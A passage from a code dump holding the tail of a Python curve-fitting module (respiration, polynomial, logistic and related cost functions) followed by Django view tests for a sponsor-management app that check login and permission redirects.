-------
float
function value(s)
"""
    return p[0]*x
def cost_line0(p,x,y):
"""
Sum of absolute deviations of obs and straight line through origin: a*x
Parameters
----------
p : iterable of floats
`p[0]` is a
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-line0_p(x,p)))
def cost2_line0(p,x,y):
"""
Sum of squared deviations of obs and straight line through origin: a*x
Parameters
----------
p : iterable of floats
`p[0]` is a
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-line0_p(x,p))**2)
# -----------------------------------------------------------
# lloyd_fix
def lloyd_fix(T, Rref, E0):
"""
Lloyd & Taylor (1994) Arrhenius type with T0=-46.02 degC and Tref=10 degC
Parameters
----------
T : float or array_like of floats
Temperature [K]
Rref : float
Respiration at Tref=10 degC [umol(C) m-2 s-1]
E0 : float
Activation energy [K]
Returns
-------
float
Respiration [umol(C) m-2 s-1]
"""
Tref = 283.15 # 10 [degC]
T0 = 227.13 # -46.02 [degC]
return Rref*np.exp(E0*(1./(Tref-T0)-1./(T-T0)))
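# Note: at T = Tref = 283.15 K the exponent vanishes and lloyd_fix returns
# Rref exactly; E0 sets the temperature sensitivity around that reference.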
def lloyd_fix_p(T, p):
"""
Lloyd & Taylor (1994) Arrhenius type with T0=-46.02 degC and Tref=10 degC
Parameters
----------
T : float or array_like of floats
Temperature [K]
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` Respiration at Tref=10 degC [umol(C) m-2 s-1]
`p[1]` Activation energy [K]
Returns
-------
float
Respiration [umol(C) m-2 s-1]
"""
Tref = 283.15 # 10 [degC]
T0 = 227.13 # -46.02 [degC]
return p[0]*np.exp(p[1]*(1./(Tref-T0)-1./(T-T0)))
def cost_lloyd_fix(p, T, resp):
"""
Sum of absolute deviations of obs and Lloyd & Taylor (1994) Arrhenius type.
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` Respiration at Tref=10 degC [umol(C) m-2 s-1]
`p[1]` Activation energy [K]
T : float or array_like of floats
Temperature [K]
resp : float or array_like of floats
Observed respiration [umol(C) m-2 s-1]
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(resp-lloyd_fix_p(T,p)))
def cost2_lloyd_fix(p, T, resp):
"""
Sum of squared deviations of obs and Lloyd & Taylor (1994) Arrhenius type.
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` Respiration at Tref=10 degC [umol(C) m-2 s-1]
`p[1]` Activation energy [K]
T : float or array_like of floats
Temperature [K]
resp : float or array_like of floats
Observed respiration [umol(C) m-2 s-1]
Returns
-------
float
sum of squared deviations
"""
return np.sum((resp-lloyd_fix_p(T,p))**2)
# -----------------------------------------------------------
# lloyd_only_rref
def lloyd_only_rref(et, Rref):
"""
    If E0 is known in Lloyd & Taylor (1994), one can calculate
    the exponential term outside the routine and the fitting
    becomes linear. One could also use functions.line0.
Parameters
----------
et : float or array_like of floats
exp-term in Lloyd & Taylor
Rref : float
Respiration at Tref=10 degC [umol(C) m-2 s-1]
Returns
-------
float
Respiration [umol(C) m-2 s-1]
"""
return Rref*et
def lloyd_only_rref_p(et, p):
"""
    If E0 is known in Lloyd & Taylor (1994), one can calculate
    the exponential term outside the routine and the fitting
    becomes linear. One could also use functions.line0.
Parameters
----------
et : float or array_like of floats
exp-term in Lloyd & Taylor
p : iterable of floats
`p[0]` is respiration at Tref=10 degC [umol(C) m-2 s-1]
Returns
-------
float
Respiration [umol(C) m-2 s-1]
"""
return p[0]*et
def cost_lloyd_only_rref(p, et, resp):
"""
Sum of absolute deviations of obs and Lloyd & Taylor with known exponential term.
Parameters
----------
p : iterable of floats
`p[0]` is respiration at Tref=10 degC [umol(C) m-2 s-1]
et : float or array_like of floats
exp-term in Lloyd & Taylor
resp : float or array_like of floats
Observed respiration [umol(C) m-2 s-1]
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(resp-lloyd_only_rref_p(et,p)))
def cost2_lloyd_only_rref(p, et, resp):
"""
Sum of squared deviations of obs and Lloyd & Taylor with known exponential term.
Parameters
----------
p : iterable of floats
`p[0]` is respiration at Tref=10 degC [umol(C) m-2 s-1]
et : float or array_like of floats
exp-term in Lloyd & Taylor
resp : float or array_like of floats
Observed respiration [umol(C) m-2 s-1]
Returns
-------
float
sum of squared deviations
"""
return np.sum((resp-lloyd_only_rref_p(et,p))**2)
# -----------------------------------------------------------
# sqrt(a + b/x) - theoretical form of Jackknife-after-bootstrap
def sabx(x, a, b):
"""
Square root of general 1/x function: sqrt(a + b/x)
Parameters
----------
x : float or array_like of floats
independent variable
a : float
first parameter
b : float
second parameter
Returns
-------
float
function value(s)
"""
return np.sqrt(a+b/x)
def sabx_p(x, p):
"""
Square root of general 1/x function: sqrt(a + b/x)
Parameters
----------
x : float or array_like of floats
independent variable
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` a
`p[1]` b
Returns
-------
float
function value(s)
"""
return np.sqrt(p[0]+p[1]/x)
def cost_sabx(p,x,y):
"""
Sum of absolute deviations of obs and square root of general 1/x function: sqrt(a + b/x)
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` a
`p[1]` b
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-sabx_p(x,p)))
def cost2_sabx(p,x,y):
"""
Sum of squared deviations of obs and square root of general 1/x function: sqrt(a + b/x)
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` a
`p[1]` b
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-sabx_p(x,p))**2)
# -----------------------------------------------------------
# c0 + c1*x + c2*x**2 + ... + cn*x**n
def poly(x,*args):
"""
General polynomial: c0 + c1*x + c2*x**2 + ... + cn*x**n
Parameters
----------
x : float or array_like of floats
independent variable
*args : float
parameters `len(args)=n+1`
Returns
-------
float
function value(s)
"""
return np.polynomial.polynomial.polyval(x, list(args))
def poly_p(x,p):
"""
General polynomial: c0 + c1*x + c2*x**2 + ... + cn*x**n
Parameters
----------
x : float or array_like of floats
independent variable
p : iterable of floats
parameters (`len(p)=n+1`)
Returns
-------
float
function value(s)
"""
return np.polynomial.polynomial.polyval(x, p)
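# Usage note (an assumed but typical pattern, not from the original module):
# because poly takes *args, scipy.optimize.curve_fit cannot infer the number
# of coefficients and needs an explicit p0, e.g. for a quadratic:
#     popt, pcov = scipy.optimize.curve_fit(poly, x, y, p0=[0., 1., 0.])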
def cost_poly(p,x,y):
"""
Sum of absolute deviations of obs and general polynomial: c0 + c1*x + c2*x**2 + ... + cn*x**n
Parameters
----------
p : iterable of floats
parameters (`len(p)=n+1`)
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-poly_p(x,p)))
def cost2_poly(p,x,y):
"""
Sum of squared deviations of obs and general polynomial: c0 + c1*x + c2*x**2 + ... + cn*x**n
Parameters
----------
p : iterable of floats
parameters (`len(p)=n+1`)
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-poly_p(x,p))**2)
# -----------------------------------------------------------
# a/(1+exp(-b(x-c))) - logistic function
def cost_logistic(p, x, y):
"""
Sum of absolute deviations of obs and logistic function L/(1+exp(-k(x-x0)))
Parameters
----------
p : iterable of floats
parameters (`len(p)=3`)
`p[0]` L - Maximum of logistic function
`p[1]` k - Steepness of logistic function
`p[2]` x0 - Inflection point of logistic function
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-logistic_p(x,p)))
def cost2_logistic(p,x,y):
"""
Sum of squared deviations of obs and logistic function L/(1+exp(-k(x-x0)))
Parameters
----------
p : iterable of floats
parameters (`len(p)=3`)
`p[0]` L - Maximum of logistic function
`p[1]` k - Steepness of logistic function
`p[2]` x0 - Inflection point of logistic function
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-logistic_p(x,p))**2)
# -----------------------------------------------------------
# a/(1+exp(-b(x-c))) + d - logistic function with offset
def cost_logistic_offset(p, x, y):
"""
    Sum of absolute deviations of obs and logistic function with offset: L/(1+exp(-k(x-x0))) + a
Parameters
----------
p : iterable of floats
parameters (`len(p)=4`)
`p[0]` L - Maximum of logistic function
`p[1]` k - Steepness of logistic function
`p[2]` x0 - Inflection point of logistic function
`p[3]` a - Offset of logistic function
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-logistic_offset_p(x,p)))
def cost2_logistic_offset(p,x,y):
"""
    Sum of squared deviations of obs and logistic function with offset: L/(1+exp(-k(x-x0))) + a
Parameters
----------
p : iterable of floats
parameters (`len(p)=4`)
`p[0]` L - Maximum of logistic function
`p[1]` k - Steepness of logistic function
`p[2]` x0 - Inflection point of logistic function
`p[3]` a - Offset of logistic function
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-logistic_offset_p(x,p))**2)
# -----------------------------------------------------------
# L1/(1+exp(-k1(x-x01))) - L2/(1+exp(-k2(x-x02))) + a - double logistic function with offset
def cost_logistic2_offset(p, x, y):
"""
Sum of absolute deviations of obs and double logistic function with offset:
L1/(1+exp(-k1(x-x01))) - L2/(1+exp(-k2(x-x02))) + a
Parameters
----------
p : iterable of floats
parameters (`len(p)=7`)
`p[0]` L1 - Maximum of first logistic function
`p[1]` k1 - Steepness of first logistic function
`p[2]` x01 - Inflection point of first logistic function
`p[3]` L2 - Maximum of second logistic function
`p[4]` k2 - Steepness of second logistic function
`p[5]` x02 - Inflection point of second logistic function
`p[6]` a - Offset of double logistic function
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-logistic2_offset_p(x,p)))
def cost2_logistic2_offset(p,x,y):
"""
Sum of squared deviations of obs and double logistic function with offset:
L1/(1+exp(-k1(x-x01))) - L2/(1+exp(-k2(x-x02))) + a
Parameters
----------
p : iterable of floats
parameters (`len(p)=7`)
`p[0]` L1 - Maximum of first logistic function
`p[1]` k1 - Steepness of first logistic function
`p[2]` x01 - Inflection point of first logistic function
`p[3]` L2 - Maximum of second logistic function
`p[4]` k2 - Steepness of second logistic function
`p[5]` x02 - Inflection point of second logistic function
`p[6]` a - Offset of double logistic function
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-logistic2_offset_p(x,p))**2)
# -----------------------------------------------------------
# a*(x-b)**c - Sequential Elementary Effects fitting function
def see(x, a, b, c):
"""
Fit function of Sequential Elementary Effects: a * (x-b)**c
Parameters
----------
x : float or array_like of floats
independent variable
a : float
first parameter
b : float
second parameter
c : float
third parameter
Returns
-------
float
function value(s)
"""
return np.where((x-b)<0., 0., a*(x-b)**c)
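# Note: np.where evaluates both branches, so a*(x-b)**c is computed even where
# x < b; with non-integer c this can emit invalid-value warnings although the
# masked result is 0 there.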
def see_p(x, p):
"""
Fit function of Sequential Elementary Effects: a * (x-b)**c
Parameters
----------
x : float or array_like of floats
independent variable
p : iterable of floats
parameters (`len(p)=3`)
`p[0]` a
`p[1]` b
`p[2]` c
Returns
-------
float
function value(s)
"""
return np.where((x-p[1]) < 0., 0., p[0] * (x-p[1])**p[2])
def cost_see(p, x, y):
"""
Sum of absolute deviations of obs and fit function of Sequential Elementary Effects: a * (x-b)**c
Parameters
----------
p : iterable of floats
parameters (`len(p)=3`)
`p[0]` a
`p[1]` b
`p[2]` c
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-see_p(x,p)))
def cost2_see(p, x, y):
"""
Sum of squared deviations of obs and fit function of Sequential Elementary Effects: a * (x-b)**c
Parameters
----------
p : iterable of floats
parameters (`len(p)=3`)
`p[0]` a
`p[1]` b
`p[2]` c
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-see_p(x,p))**2)
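# Quick illustrative check of the clamping behaviour of `see` (values
# computed by hand, not taken from the original test suite):
#
#     see(np.array([0., 1., 3.]), a=2., b=1., c=0.5)
#     # -> array([0., 0., 2.82842712]); for c > 0, points with x <= b map to 0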
# -----------------------------------------------------------
if __name__ == '__main__':
import doctest
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
# Rref = 1.0
# E0 = 126.
# T = 293.15
# resp = 2.0
# print(lloyd_fix(T, Rref, E0))
# #1.40590910521
# print(lloyd_fix_p(T, [Rref, E0]))
# #1.40590910521
# print(cost_lloyd_fix([Rref, E0], T, resp))
# #0.59409089479
# print(cost2_lloyd_fix([Rref, E0], T, resp))
# #0.352943991272
# print(poly(T,2,1))
# #295.15
# print(poly_p(T,[2,1]))
# #295.15
[... per-file quality-signal columns omitted ...]
e6f7cd48e876b5d98ccfe0ce08d644eac95b97b0 | 39,865 | py | Python | tests/tests_views.py | hbuyse/dj-sponsoring | dc1652ab7dbaa25199505dd680e28289a86c7d77 | ["MIT"] | null | null | null
#! /usr/bin/env python
# coding=utf-8
"""Tests the views."""
from dj_sponsoring.models import Sponsor, SponsorImage, SponsorFile
from django.conf import settings
from django.contrib.auth.models import Permission, User
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import TestCase
from django.urls import reverse
import os.path
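# The view tests below all follow the same access-control pattern: an
# anonymous request is redirected to login (302 with a ?next= parameter), a
# logged-in user without the relevant model permission is redirected the same
# way, and only a user granted the matching Django permission gets a 200 on
# GET or a 302 to the detail view on a successful POST.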
class TestSponsorListView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.dict = {
'name': 'Toto',
'summary': 'summary',
'description': 'description',
'url': 'http://www.google.fr',
'logo': SimpleUploadedFile(name='index.png',
content=open("tests/index.png", 'rb').read(),
content_type='image/png')
}
def test_sponsors_list_view_empty(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsors-list'))
self.assertEqual(r.status_code, 200)
self.assertIn("No sponsors...", str(r.content))
def test_sponsors_list_view_one_sponsor(self):
"""Tests."""
Sponsor.objects.create(**self.dict)
r = self.client.get(reverse('dj_sponsoring:sponsors-list'))
self.assertEqual(r.status_code, 200)
self.assertEqual(str(r.content).count('<ul>'), 1)
self.assertEqual(str(r.content).count('<li>'), 1)
self.assertIn("Toto", str(r.content))
self.assertEqual(str(r.content).count('</li>'), 1)
self.assertEqual(str(r.content).count('</ul>'), 1)
class TestSponsorDetailView(TestCase):
"""Tests."""
def test_sponsor_detail_view_not_existing(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-detail', kwargs={'pk': 1}))
self.assertEqual(r.status_code, 404)
def test_sponsor_detail_view(self):
"""Tests."""
Sponsor.objects.create(name="Toto")
r = self.client.get(reverse('dj_sponsoring:sponsor-detail', kwargs={'pk': 1}))
self.assertEqual(r.status_code, 200)
self.assertIn("Toto", str(r.content))
class TestSponsorCreateView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.user = User.objects.create_user(username="username", password="password")
self.dict = {
'name': 'Toto',
'summary': 'summary',
'description': 'description',
'url': 'http://www.google.fr',
'logo': SimpleUploadedFile(name='index.png',
content=open("tests/index.png", 'rb').read(),
content_type='image/png')
}
def test_sponsor_create_view_get_as_anonymous(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-create'))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/create', r.url)
def test_sponsor_create_view_post_as_anonymous(self):
"""Tests."""
r = self.client.post(reverse('dj_sponsoring:sponsor-create'), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/create', r.url)
def test_sponsor_create_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.get(reverse('dj_sponsoring:sponsor-create'))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/create', r.url)
def test_sponsor_create_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.post(reverse('dj_sponsoring:sponsor-create'), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/create', r.url)
def test_sponsor_create_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can add sponsor'))
r = self.client.get(reverse('dj_sponsoring:sponsor-create'))
self.assertEqual(r.status_code, 200)
self.assertEqual(str(r.content).count('<label'), 5)
self.assertEqual(str(r.content).count('</label>'), 5)
self.assertIn('Sponsor name', str(r.content))
self.assertIn('Sponsor summary', str(r.content))
self.assertIn('Sponsor description', str(r.content))
self.assertIn('Sponsor logo', str(r.content))
self.assertIn('Sponsor url', str(r.content))
def test_sponsor_create_view_post_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can add sponsor'))
r = self.client.post(reverse('dj_sponsoring:sponsor-create'), data=self.dict)
s = Sponsor.objects.last()
self.assertEqual(s.name, "Toto")
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('dj_sponsoring:sponsor-detail', kwargs={'pk': s.id}))
self.assertTrue(os.path.isfile("{}/sponsors/{}/logo.png".format(settings.MEDIA_ROOT, s.name)))
class TestSponsorUpdateView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.user = User.objects.create_user(username="username", password="password")
self.dict = {
'name': 'My Toto',
'summary': 'My summary',
'description': 'My description',
'url': 'http://www.google.fr',
'logo': SimpleUploadedFile(name='index.png',
content=open("tests/index.png", 'rb').read(),
content_type='image/png')
}
self.sponsor = Sponsor.objects.create(**self.dict)
def test_sponsor_update_view_get_as_anonymous(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-update', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/update'.format(self.sponsor.id), r.url)
def test_sponsor_update_view_post_as_anonymous(self):
"""Tests."""
r = self.client.post(reverse('dj_sponsoring:sponsor-update', kwargs={'pk': self.sponsor.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/update'.format(self.sponsor.id), r.url)
def test_sponsor_update_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.get(reverse('dj_sponsoring:sponsor-update', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/update'.format(self.sponsor.id), r.url)
def test_sponsor_update_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.post(reverse('dj_sponsoring:sponsor-update', kwargs={'pk': self.sponsor.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/update'.format(self.sponsor.id), r.url)
def test_sponsor_update_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can change sponsor'))
r = self.client.get(reverse('dj_sponsoring:sponsor-update', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 200)
self.assertEqual(str(r.content).count('<label'), 5)
self.assertEqual(str(r.content).count('</label>'), 5)
self.assertIn('Sponsor name', str(r.content))
self.assertIn('Toto', str(r.content))
self.assertIn('Sponsor summary', str(r.content))
self.assertIn('My summary', str(r.content))
self.assertIn('Sponsor description', str(r.content))
self.assertIn('My description', str(r.content))
self.assertIn('Sponsor logo', str(r.content))
self.assertIn('logo.png', str(r.content))
self.assertIn('Sponsor url', str(r.content))
self.assertIn('http://www.google.fr', str(r.content))
def test_sponsor_update_view_post_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can change sponsor'))
self.dict['name'] = 'Toto new'
self.dict['logo'] = SimpleUploadedFile(name='index.png',
content=open("tests/index.png", 'rb').read(),
content_type='image/png')
r = self.client.post(reverse('dj_sponsoring:sponsor-update', kwargs={'pk': self.sponsor.id}), data=self.dict)
s = Sponsor.objects.get(id=self.sponsor.id)
self.assertEqual(s.name, "Toto new")
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('dj_sponsoring:sponsor-detail', kwargs={'pk': s.id}))
self.assertTrue(os.path.isfile("{}/sponsors/{}/logo.png".format(settings.MEDIA_ROOT, s.name)))
class TestSponsorDeleteView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.user = User.objects.create_user(username="username", password="password")
self.dict = {
'name': 'My Toto',
'summary': 'My summary',
'description': 'My description',
'url': 'http://www.google.fr',
'logo': SimpleUploadedFile(name='index.png',
content=open("tests/index.png", 'rb').read(),
content_type='image/png')
}
self.sponsor = Sponsor.objects.create(**self.dict)
def test_sponsor_delete_view_get_as_anonymous(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-delete', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/delete'.format(self.sponsor.id), r.url)
def test_sponsor_delete_view_post_as_anonymous(self):
"""Tests."""
r = self.client.post(reverse('dj_sponsoring:sponsor-delete', kwargs={'pk': self.sponsor.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/delete'.format(self.sponsor.id), r.url)
def test_sponsor_delete_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.get(reverse('dj_sponsoring:sponsor-delete', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/delete'.format(self.sponsor.id), r.url)
def test_sponsor_delete_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.post(reverse('dj_sponsoring:sponsor-delete', kwargs={'pk': self.sponsor.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/delete'.format(self.sponsor.id), r.url)
def test_sponsor_delete_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can delete sponsor'))
r = self.client.get(reverse('dj_sponsoring:sponsor-delete', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 200)
self.assertIn("<h1 class=\"float-left\">{}</h1>".format(self.sponsor.name), str(r.content))
self.assertIn("<p>Do you really want to delete that sponsor and everything linked to it?</p>", str(r.content))
def test_sponsor_delete_view_post_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can delete sponsor'))
self.assertEqual(Sponsor.objects.count(), 1)
r = self.client.post(reverse('dj_sponsoring:sponsor-delete', kwargs={'pk': self.sponsor.id}))
self.assertEqual(Sponsor.objects.count(), 0)
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('dj_sponsoring:sponsors-list'))
class TestSponsorImageListView(TestCase):
"""Tests."""
def setUp(self):
"""Setup for TestSponsorImageListView."""
self.sponsor = Sponsor.objects.create(name="Toto")
def test_sponsor_images_list_view_empty(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-images-list', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 200)
self.assertIn("No images for this sponsor...", str(r.content))
def test_sponsor_image_list_view_one_image(self):
"""Tests."""
SponsorImage.objects.create(sponsor=self.sponsor, alt="Toto")
r = self.client.get(reverse('dj_sponsoring:sponsor-images-list', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 200)
self.assertIn("Toto", str(r.content))
class TestSponsorImageDetailView(TestCase):
"""Tests."""
def setUp(self):
"""Setup for TestSponsorImageListView."""
self.sponsor = Sponsor.objects.create(name="Toto")
def test_sponsor_image_detail_view_not_existing(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-image-detail', kwargs={'pk': 1}))
self.assertEqual(r.status_code, 404)
def test_sponsor_image_detail_view(self):
"""Tests."""
SponsorImage.objects.create(sponsor=self.sponsor, alt="My alternative text")
r = self.client.get(reverse('dj_sponsoring:sponsor-image-detail', kwargs={'pk': 1}))
self.assertEqual(r.status_code, 200)
self.assertIn("Toto", str(r.content))
class TestSponsorImageCreateView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.user = User.objects.create_user(username="username", password="password")
self.sponsor = Sponsor.objects.create(name="Toto")
self.dict = {
'img': SimpleUploadedFile(name='index.png',
content=open("tests/index.png", 'rb').read(),
content_type='image/png'),
'alt': "My alt",
'description': "My description"
}
def test_sponsor_image_create_view_get_as_anonymous(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-image-create', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/images/create'.format(self.sponsor.id), r.url)
def test_sponsor_image_create_view_post_as_anonymous(self):
"""Tests."""
r = self.client.post(reverse('dj_sponsoring:sponsor-image-create', kwargs={'pk': self.sponsor.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/images/create'.format(self.sponsor.id), r.url)
def test_sponsor_image_create_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.get(reverse('dj_sponsoring:sponsor-image-create', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/images/create'.format(self.sponsor.id), r.url)
def test_sponsor_image_create_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.post(reverse('dj_sponsoring:sponsor-image-create', kwargs={'pk': self.sponsor.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/images/create'.format(self.sponsor.id), r.url)
def test_sponsor_image_create_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can add sponsor image'))
r = self.client.get(reverse('dj_sponsoring:sponsor-image-create', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 200)
self.assertEqual(str(r.content).count('<label'), 3)
self.assertEqual(str(r.content).count('</label>'), 3)
self.assertIn('Sponsor image alternative text', str(r.content))
self.assertIn('Sponsor image', str(r.content))
self.assertIn('Sponsor image description text', str(r.content))
def test_sponsor_image_create_view_post_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can add sponsor image'))
r = self.client.post(reverse('dj_sponsoring:sponsor-image-create',
kwargs={'pk': self.sponsor.id}), data=self.dict)
s = SponsorImage.objects.last()
self.assertEqual(s.alt, "My alt")
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('dj_sponsoring:sponsor-image-detail', kwargs={'pk': s.id}))
self.assertTrue(os.path.isfile(
"{}/sponsors/{}/images/{}".format(settings.MEDIA_ROOT, s.sponsor.name, self.dict['img'].name)))
class TestSponsorImageUpdateView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.user = User.objects.create_user(username="username", password="password")
sponsor = Sponsor.objects.create(name="Toto")
self.dict = {
'sponsor': sponsor,
'img': SimpleUploadedFile(name='index.png',
content=open("tests/index.png", 'rb').read(),
content_type='image/png'),
'alt': "My alt",
'description': "My description"
}
self.si = SponsorImage.objects.create(**self.dict)
def test_sponsor_image_update_view_get_as_anonymous(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-image-update', kwargs={'pk': self.si.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/images/{}/update'.format(self.si.id), r.url)
def test_sponsor_image_update_view_post_as_anonymous(self):
"""Tests."""
r = self.client.post(reverse('dj_sponsoring:sponsor-image-update', kwargs={'pk': self.si.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/images/{}/update'.format(self.si.id), r.url)
def test_sponsor_image_update_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.get(reverse('dj_sponsoring:sponsor-image-update', kwargs={'pk': self.si.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/images/{}/update'.format(self.si.id), r.url)
def test_sponsor_image_update_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.post(reverse('dj_sponsoring:sponsor-image-update', kwargs={'pk': self.si.id}), self.dict)
